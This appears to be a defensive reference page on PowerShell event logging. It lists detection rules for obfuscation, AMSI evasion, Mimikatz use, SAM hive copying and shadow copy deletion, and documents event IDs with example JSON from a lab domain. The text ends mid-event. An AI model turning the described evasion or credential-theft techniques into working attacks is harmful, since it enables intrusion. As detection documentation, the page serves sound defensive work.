- Potential PowerShell Obfuscation via Invalid Escape Sequences source medium: Detects PowerShell scripts with repeated invalid backtick escapes between word characters (letters, digits, underscore, or dash), splitting tokens while preserving execution. Attackers use this obfuscation to fragment keywords and evade pattern-based detection and AMSI.
- Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion source high: Detects PowerShell scripts that use backtick-escaped characters inside
${}variable expansion (multiple backticks between word characters) to reconstruct strings at runtime. Attackers use variable-expansion obfuscation to split keywords, hide commands, and evade static analysis and AMSI. - Potential PowerShell Obfuscation via Character Array Reconstruction source high: Detects PowerShell scripts that reconstructs strings from char[] arrays, index lookups, or repeated ([char]NN)+ concatenation/join logic. Attackers use character-array reconstruction to hide commands, URLs, or payloads and evade static analysis and AMSI.
Show 10 more (13 total)
- Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation source high: Detects PowerShell scripts that builds commands from concatenated string literals inside dynamic invocation constructs like &() or .(). Attackers use concatenated dynamic invocation to obscure execution intent, bypass keyword-based detections, and evade AMSI.
- Potential PowerShell Obfuscation via High Numeric Character Proportion source low: Detects long PowerShell script block content with unusually high numeric character density (high digit-to-length ratio), often produced by byte arrays, character-code reconstruction, or embedded encoded blobs. Attackers use numeric-heavy obfuscation to conceal payloads and rebuild them at runtime to avoid static inspection.
- Potential Dynamic IEX Reconstruction via Environment Variables source medium: Detects PowerShell scripts that reconstructs IEX (Invoke-Expression) by indexing environment variable strings (for example, $env:VAR[1,2,3]) or related
.name[...]slices and joining characters at runtime. Attackers use environment-variable slicing to hide dynamic execution and evade keyword-based detections and AMSI. - Dynamic IEX Reconstruction via Method String Access source low: Detects PowerShell scripts that rebuilds IEX by converting method references to strings (for example, ''.IndexOf.ToString()) and extracting multiple indexed characters (for example, [n,n,n]). Attackers use method-string reconstruction to conceal dynamic execution and bypass static detections and AMSI.
- PowerShell Obfuscation via Negative Index String Reversal source low: Detects PowerShell scripts that uses negative index ranges (for example, $var[-1..0]) to reverse strings or arrays and rebuild content at runtime. Attackers use index reversal to reconstruct hidden commands or payloads and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Reverse Keywords source low: Detects PowerShell scripts containing reversed keyword strings associated with execution or network activity (for example, ekovni, noisserpxe, daolnwod, tcejbo-wen, tcejboimw, etc.). Attackers reverse keywords and reconstruct them at runtime to hide intent and evade static detection and AMSI.
- Potential PowerShell Obfuscation via String Concatenation source high: Detects PowerShell scripts that repeatedly concatenate multiple quoted string literals with + to assemble commands or tokens at runtime. Attackers use string concatenation to fragment keywords or URLs and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via String Reordering source medium: Detects PowerShell scripts that uses format placeholders like "{0}{1}" with the -f operator or ::Format to reorder strings at runtime. Attackers use format-based reconstruction to hide commands or payload strings and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Special Character Overuse source medium: Detects PowerShell scripts dominated by whitespace and special characters with low symbol diversity, a profile often produced by formatting or encoding obfuscation. Attackers use symbol-heavy encoding or formatting (for example, SecureString-style blobs or character-level transforms) to hide payloads and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via High Special Character Proportion source low: Identifies PowerShell script block content with an unusually high proportion of non-alphanumeric characters, often produced by encoding, string mangling, or dynamic code generation. Attackers use special-character heavy obfuscation to conceal payloads and hinder static analysis and AMSI.
Splunk # view in coverage
- AdsiSearcher Account Discovery source: The following analytic detects the use of the
[Adsisearcher]type accelerator in PowerShell to query Active Directory for domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify script blocks containing… - Allow Inbound Traffic In Firewall Rule source: The following analytic detects a suspicious PowerShell command that allows inbound traffic to a specific local port within the public profile. It leverages PowerShell script block logging (EventCode 4104) to identify commands containing…
- Delete ShadowCopy With PowerShell source: The following analytic detects the use of PowerShell to delete shadow copies via the WMIC PowerShell module. It leverages EventCode 4104 and searches for specific keywords like "ShadowCopy," "Delete," or "Remove" within the…
Show 17 more (173 total)
- Detect Certify With PowerShell Script Block Logging source: The following analytic detects the use of the Certify tool via an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. It leverages PowerShell Script Block Logging (EventCode 4104) to…
- Detect Copy of ShadowCopy with Script Block Logging source: The following analytic detects the use of PowerShell commands to copy the SAM, SYSTEM, or SECURITY hives, which are critical for credential theft. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the…
- Detect Empire with PowerShell Script Block Logging source: The following analytic detects suspicious PowerShell execution indicative of PowerShell-Empire activity. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze commands sent to PowerShell, specifically looking…
- Detect Mimikatz With PowerShell Script Block Logging source: The following analytic detects the execution of Mimikatz commands via PowerShell by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the…
- Disabled Kerberos Pre-Authentication Discovery With Get-ADUser source: The following analytic detects the execution of the
Get-ADUserPowerShell cmdlet with parameters indicating a search for domain accounts with Kerberos Pre-Authentication disabled. It leverages PowerShell Script Block Logging… - Disabled Kerberos Pre-Authentication Discovery With PowerView source: The following analytic detects the execution of the
Get-DomainUsercommandlet with the-PreauthNotRequiredparameter using PowerShell Script Block Logging (EventCode=4104). This command is part of PowerView, a tool used for enumerating… - Domain Group Discovery with Adsisearcher source: The following analytic detects the use of the
[Adsisearcher]type accelerator in PowerShell to query Active Directory for domain groups. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks… - Elevated Group Discovery with PowerView source: The following analytic detects the execution of the
Get-DomainGroupMembercmdlet from PowerView, identified through PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate members of elevated domain groups such… - Exchange PowerShell Module Usage source: The following analytic detects the usage of specific Exchange PowerShell modules, such as New-MailboxExportRequest, New-ManagementRoleAssignment, New-MailboxSearch, and Get-Recipient. It leverages PowerShell Script Block Logging (EventCode…
- Get ADDefaultDomainPasswordPolicy with Powershell Script Block source: The following analytic detects the execution of the
Get-ADDefaultDomainPasswordPolicyPowerShell cmdlet, which is used to retrieve the password policy in a Windows domain. This detection leverages PowerShell Script Block Logging… - Get ADUser with PowerShell Script Block source: The following analytic detects the execution of the
Get-AdUserPowerShell cmdlet, which is used to enumerate all domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify instances where this command is… - Get ADUserResultantPasswordPolicy with Powershell Script Block source: The following analytic detects the execution of the
Get-ADUserResultantPasswordPolicyPowerShell cmdlet, which is used to obtain the password policy in a Windows domain. It leverages PowerShell Script Block Logging (EventCode=4104) to… - Get DomainPolicy with Powershell Script Block source: The following analytic detects the execution of the
Get-DomainPolicycmdlet using PowerShell Script Block Logging (EventCode=4104). It leverages logs capturing script block text to identify attempts to obtain the password policy in a… - Get-DomainTrust with PowerShell Script Block source: The following analytic detects the execution of the Get-DomainTrust command from PowerView using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed inspection.…
- Get DomainUser with PowerShell Script Block source: The following analytic detects the execution of the
Get-DomainUsercmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a tool often used for domain enumeration. The detection leverages… - Get-ForestTrust with PowerShell Script Block source: The following analytic detects the execution of the Get-ForestTrust command from PowerSploit using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility…
- Get WMIObject Group Discovery with Script Block Logging source: The following analytic detects the execution of the
Get-WMIObject Win32_Groupcommand using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed analysis.…
Kusto # view in coverage
- Suspicious Powershell Commandlet Executed source medium: This analytic rule detects when a suspicious PowerShell commandlet is executed on a host. Threat actors often use PowerShell to execute commands and scripts to move laterally, escalate privileges, and exfiltrate data.
References #
Event ID 4105: Started invocation of ScriptBlock ID: ScriptBlockId.
#Description
Started invocation of ScriptBlock ID: ScriptBlockId.
Message #
Fields #
| Name | Description |
|---|---|
ScriptBlockId UnicodeString | Started invocation of ScriptBlock ID. |
RunspaceId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4105,
"version": 1,
"level": 5,
"task": 102,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9762883+00:00",
"event_record_id": 292345,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0000-CDB8-82C688EFDC01}"
},
"execution": {
"process_id": 4440,
"thread_id": 3676
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ScriptBlockId": "04d49ce2-3f05-45a9-957c-5758c9f59afd",
"RunspaceId": "433997d9-ccc4-4c0d-bc9b-e1f7f9b3ed04"
},
"message": "Started invocation of ScriptBlock ID: 04d49ce2-3f05-45a9-957c-5758c9f59afd\r\nRunspace ID: 433997d9-ccc4-4c0d-bc9b-e1f7f9b3ed04"
}
References #
Event ID 4106: Completed invocation of ScriptBlock ID: ScriptBlockId.
#Description
Completed invocation of ScriptBlock ID: ScriptBlockId.
Message #
Fields #
| Name | Description |
|---|---|
ScriptBlockId UnicodeString | Completed invocation of ScriptBlock ID. |
RunspaceId UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4106,
"version": 1,
"level": 5,
"task": 103,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9776346+00:00",
"event_record_id": 292349,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0006-879F-82C688EFDC01}"
},
"execution": {
"process_id": 4440,
"thread_id": 7812
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ScriptBlockId": "cfd3b61c-5457-44b3-aee3-bbfbd9689340",
"RunspaceId": "b4551755-8da0-496c-9c88-6bf2955ba423"
},
"message": "Completed invocation of ScriptBlock ID: cfd3b61c-5457-44b3-aee3-bbfbd9689340\r\nRunspace ID: b4551755-8da0-496c-9c88-6bf2955ba423"
}
References #
Event ID 7937: ContextInfo Context: Context User Data: User_Data.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 7937,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": "0x4000000000000020",
"time_created": "2026-06-02T04:29:47.997+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0003-4D12-848753F0DC01}"
},
"execution": {
"process_id": 7868,
"thread_id": 3636
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.20348.4294\r\n Host ID = 2b5c509a-8716-4b8e-9e7b-d73a2aa98dcd\r\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Tools\\Sealighter\\drv\\drv04.ps1\r\n Engine Version = 5.1.20348.4294\r\n Runspace ID = 2d8a8c17-0da2-4dfe-a42d-bebe964bcedb\r\n Pipeline ID = 1\r\n Command Name = Start-Job\r\n Command Type = Cmdlet\r\n Script Name = C:\\Tools\\Sealighter\\drv\\drv04.ps1\r\n Command Path = \r\n Sequence Number = 721\r\n User = ludus\\domainadmin\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n",
"Payload": "Command System.Management.Automation.LogContext is Stopped.\r\n",
"UserData": ""
},
"message": "win:None"
}
Event ID 7938: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7938",
"version": "1",
"level": "4",
"task": "100",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:37.067269800+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "12172"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = 247af873-a1bf-4dba-9ce9-5140eb54ab09\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\domainadmin\\Desktop\\automaton\\onedrive_etw_capture.ps1 -Action stop\n Engine Version = 5.1.20348.558\n Runspace ID = 83d77211-d444-44c5-9530-51739db0c2f4\n Pipeline ID = \n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 14\n User = ludus\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Engine state changed from None to Available.\n"
},
"message": ""
}
Event ID 7939: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7939",
"version": "1",
"level": "4",
"task": "104",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:36.400594000+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "8064"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = 247af873-a1bf-4dba-9ce9-5140eb54ab09\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\domainadmin\\Desktop\\automaton\\onedrive_etw_capture.ps1 -Action stop\n Engine Version = \n Runspace ID = \n Pipeline ID = \n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 2\n User = ludus\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Provider Registry changed state to Started.\n"
},
"message": ""
}
Event ID 7940: ContextInfo Context: Context User Data: User_Data.
#Event ID 7941: Correlating activity id's.
#Event ID 7942: Class Name = ClassName.
#Description
Class Name = ClassName.
Message #
Fields #
| Name | Description |
|---|---|
ClassName UnicodeString | |
MethodName UnicodeString | |
WorkflowGuid UnicodeString | |
Message UnicodeString | |
JobData UnicodeString | |
ActivityName UnicodeString | |
ActivityGuid UnicodeString | |
Parameters UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7942",
"version": "1",
"level": "5",
"task": "0",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:36.215006100+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "12008"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ClassName": "RemoteSessionNamedPipeServer",
"MethodName": "StartListening",
"WorkflowGuid": "00000000-0000-0000-0000-000000000000",
"Message": "Listener thread started on Process 5820 in AppDomainName DefaultAppDomain.",
"JobData": "",
"ActivityName": "",
"ActivityGuid": "",
"Parameters": ""
},
"message": ""
}
Event ID 8193: Creating Runspace object Instance Id.
#Description
Creating Runspace object.
Message #
Fields #
| Name | Description |
|---|---|
param1 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8193,
"version": 1,
"level": 5,
"task": 1,
"opcode": 16,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2119349+00:00",
"event_record_id": 292217,
"correlation": {
"ActivityID": "{423FC9FF-BB95-4958-9E72-EC0DE8F5F539}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "423fc9ff-bb95-4958-9e72-ec0de8f5f539"
},
"message": "Creating Runspace object \r\n \t Instance Id: 423fc9ff-bb95-4958-9e72-ec0de8f5f539"
}
Event ID 8194: Creating RunspacePool object.
#Description
Creating RunspacePool object.
Message #
Fields #
| Name | Description |
|---|---|
InstanceId UnicodeString | |
MaxRunspaces UnicodeString | |
MinRunspaces UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8194,
"version": 1,
"level": 5,
"task": 1,
"opcode": 16,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2119503+00:00",
"event_record_id": 292218,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"InstanceId": "93b2b5d3-ad4a-47fd-88fe-256547248572",
"MaxRunspaces": "1",
"MinRunspaces": "1"
},
"message": "Creating RunspacePool object \r\n \t InstanceId 93b2b5d3-ad4a-47fd-88fe-256547248572 \r\n \t MinRunspaces 1 \r\n \t MaxRunspaces 1"
}
Event ID 8195: Opening RunspacePool
#Description
Opening RunspacePool.
Message #
Fields #
| Name | Description |
|---|---|
async)_V1( |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8195,
"version": 1,
"level": 5,
"task": 1,
"opcode": 10,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2121570+00:00",
"event_record_id": 292219,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Opening RunspacePool"
}
Event ID 8196: Modifying activity Id and correlating
#Description
Modifying activity Id and correlating.
Message #
Fields #
| Name | Description |
|---|---|
async)8196_V1( |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8196,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9782661+00:00",
"event_record_id": 292350,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 1496
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Modifying activity Id and correlating"
}
Event ID 8197: Runspace state changed to param1.
#Description
Runspace state changed to param1.
Message #
Fields #
| Name | Description |
|---|---|
param1 UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 8197,
"version": 1,
"level": 5,
"task": 1,
"opcode": 10,
"keywords": 0,
"time_created": "2026-03-13T19:06:18.830885+00:00",
"event_record_id": 451785,
"correlation": {
"ActivityID": "E345B8F4-8ABD-45C2-9C94-77A035AE705C"
},
"execution": {
"process_id": 8572,
"thread_id": 13812
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-DC01.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "Closing"
},
"message": ""
}
Event ID 8198: Attempting session creation retry param1 for error code param2 on session Id param3.
#Event ID 12033: Port resolved to param1.
#Event ID 12034: AppName resolved to param1.
#Event ID 12035: ComputerName resolved to param1.
#Event ID 12036: Scheme is param1.
#Event ID 12038: Connection Paramters are Connection URI: Connection_URI Resource URI: Resource_URI User: User OpenTimeout: OpenTimeout IdleTimeout: IdleTimeout CancelTimeout: CancelTimeout AuthenticationMechanism:...
#Description
Connection Paramters are.
Message #
Fields #
| Name | Description |
|---|---|
uri UnicodeString | |
shell UnicodeString | |
userName UnicodeString | |
opentimeout UnicodeString | |
idletimeout UnicodeString | |
canceltimeout UnicodeString | |
auth UInt32 | Known values
|
thumbPrint UnicodeString | |
redircount UnicodeString | |
recvdDataSize UnicodeString | |
recvdObjSize UnicodeString |
Event ID 12039: Modifying activity Id and correlating
#Description
Modifying activity Id and correlating.
Message #
Fields #
| Name | Description |
|---|---|
async)12039_V1( |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 12039,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9782673+00:00",
"event_record_id": 292351,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 1496
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Modifying activity Id and correlating"
}
Event ID 16385: AmsiUtil state.
#Description
AmsiUtil state.
Message #
Fields #
| Name | Description |
|---|---|
Action UnicodeString | |
AmsiContext UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 16385,
"version": 1,
"level": 5,
"task": 130,
"opcode": 20,
"keywords": "0x4000000000000400",
"time_created": "2026-06-02T04:29:48.009+00:00",
"event_record_id": 0,
"correlation": {},
"execution": {
"process_id": 12528,
"thread_id": 15844
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"Action": "init-False",
"AmsiContext": "1776513328784-26365"
},
"message": "Amsi"
}
Event ID 24577: Windows PowerShell ISE has started to run script file FileName.
#Event ID 24578: Windows PowerShell ISE has started to run a user-selected script from file FileName.
#Event ID 24579: Windows PowerShell ISE is stopping the current command.
#Description
Windows PowerShell ISE is stopping the current command.
Message #
Event ID 24580: Windows PowerShell ISE is resuming the debugger.
#Description
Windows PowerShell ISE is resuming the debugger.
Message #
Event ID 24581: Windows PowerShell ISE is stopping the debugger.
#Description
Windows PowerShell ISE is stopping the debugger.
Message #
Event ID 24582: Windows PowerShell ISE is stepping into debugging.
#Description
Windows PowerShell ISE is stepping into debugging.
Message #
Event ID 24583: Windows PowerShell ISE is stepping over debugging.
#Description
Windows PowerShell ISE is stepping over debugging.
Message #
Event ID 24584: Windows PowerShell ISE is stepping out of debugging.
#Description
Windows PowerShell ISE is stepping out of debugging.
Message #
Event ID 24592: Windows PowerShell ISE is enabling all breakpoints.
#Description
Windows PowerShell ISE is enabling all breakpoints.
Message #
Event ID 24593: Windows PowerShell ISE is disabling all breakpoints.
#Description
Windows PowerShell ISE is disabling all breakpoints.
Message #
Event ID 24594: Windows PowerShell ISE is removing all breakpoints.
#Description
Windows PowerShell ISE is removing all breakpoints.
Message #
Event ID 24595: Windows PowerShell ISE is setting the breakpoint at line #: CurrentLine of file FileName.
#Event ID 24596: Windows PowerShell ISE is removing the breakpoint on line #: CurrentLine of file FileName.
#Event ID 24597: Windows PowerShell ISE is enabling the breakpoint on line #: CurrentLine of file FileName.
#Event ID 24598: Windows PowerShell ISE is disabling the breakpoint on line #: CurrentLine of file FileName.
#Event ID 24599: Windows PowerShell ISE has hit a breakpoint on line #: CurrentLine of file FileName.
#Event ID 28673: Successfully rehydrated an object.
#Description
Successfully rehydrated an object.
Message #
Fields #
| Name | Description |
|---|---|
DeserializedType UnicodeString | |
CastedToType UnicodeString | |
RehydratedType UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 28673,
"version": 1,
"level": 5,
"task": 3,
"opcode": 23,
"keywords": "0x4000000000000040",
"time_created": "2026-06-02T04:29:48.126+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{E3450CF8-EBFD-44C7-97D8-B6C7C3DA8569}"
},
"execution": {
"process_id": 7868,
"thread_id": 7116
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"CastedToType": "Microsoft.PowerShell.DeserializingTypeConverter",
"DeserializedType": "Deserialized.System.Management.Automation.PSPrimitiveDictionary@@@Deserialized.System.Collections.Hashtable@@@Deserialized.System.Object",
"RehydratedType": "System.Management.Automation.PSPrimitiveDictionary"
},
"message": "Serialization"
}
Event ID 28674: Failed to rehydrated an object.
#Event ID 28675: Serialization depth has been overriden.
#Event ID 28676: Serialization mode has been overriden.
#Event ID 28677: Serialization of a script property has been skipped, because there is no runspace to use for evaluation of the property.
#Event ID 28678: Serialization of a property has been skipped, because property getter failed.
#Event ID 28679: Serialization of an enumerable object might not be complete, because object being enumerated threw an exception.
#Event ID 28680: Serialization called object's ToString method which failed.
#Event ID 28682: Maximum depth below top level has been reached, forcing object to be serialized as strings.
#Event ID 28683: XmlException has been thrown by the deserializer (most likely indicating incorrect clixml format).
#Event ID 28684: Serialization of specified properties failed, because one of the specified properties was missing.
#Event ID 32769: Received object with Runspace Id: Runspace_InstanceId Command Id: PowerShell_InstanceId Destination: Destination DataType: DataType TargetInterface: TargetInterface.
#Description
Received object with Runspace Id: Runspace_InstanceId Command Id: PowerShell_InstanceId Destination: Destination DataType: DataType TargetInterface: TargetInterface.
Message #
Fields #
| Name | Description |
|---|---|
Runspace_InstanceId UnicodeString | |
PowerShell_InstanceId UnicodeString | |
Destination UInt32 | Known values
|
DataType UInt32 | Known values
|
TargetInterface UInt32 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 32769,
"version": 1,
"level": 4,
"task": 0,
"opcode": 10,
"keywords": "0x4000000000000008",
"time_created": "2026-06-02T04:29:48.018+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0000-F6D5-7F8753F0DC01}"
},
"execution": {
"process_id": 15220,
"thread_id": 4892
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"DataType": 65538,
"Destination": 2,
"PowerShell_InstanceId": "00000000-0000-0000-0000-000000000000",
"Runspace_InstanceId": "e3450cf8-ebfd-44c7-97d8-b6c7c3da8569",
"TargetInterface": 1
},
"message": "win:None"
}
Event ID 32775: An unhandled exception occurred in the appdomain.
#Event ID 32776: Runspace Id: SessionId Pipeline Id: PipelineId.
#Event ID 32777: An unhandled exception occurred in the appdomain.
#Event ID 32784: Runspace Id: SessionId Pipeline Id: PipelineId.
#Description
Runspace Id: SessionId Pipeline Id: PipelineId. WSMan reported an error with error code: ErrorCode.
Message #
Fields #
| Name | Description |
|---|---|
SessionId UnicodeString | |
PipelineId UnicodeString | |
ErrorCode UnicodeString | |
ErrorMessage UnicodeString | |
StackTrace UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 32784,
"version": 1,
"level": 2,
"task": 0,
"opcode": 10,
"keywords": 0,
"time_created": "2026-03-13T19:48:48.051299+00:00",
"event_record_id": 692957,
"correlation": {
"ActivityID": "0DB6BBF5-303D-4E93-8DE3-887C047E8B68"
},
"execution": {
"process_id": 1512,
"thread_id": 1452
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-DC01.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"SessionId": "0db6bbf5-303d-4e93-8de3-887c047e8b68",
"PipelineId": "00000000-0000-0000-0000-000000000000",
"ErrorCode": "-2144108101",
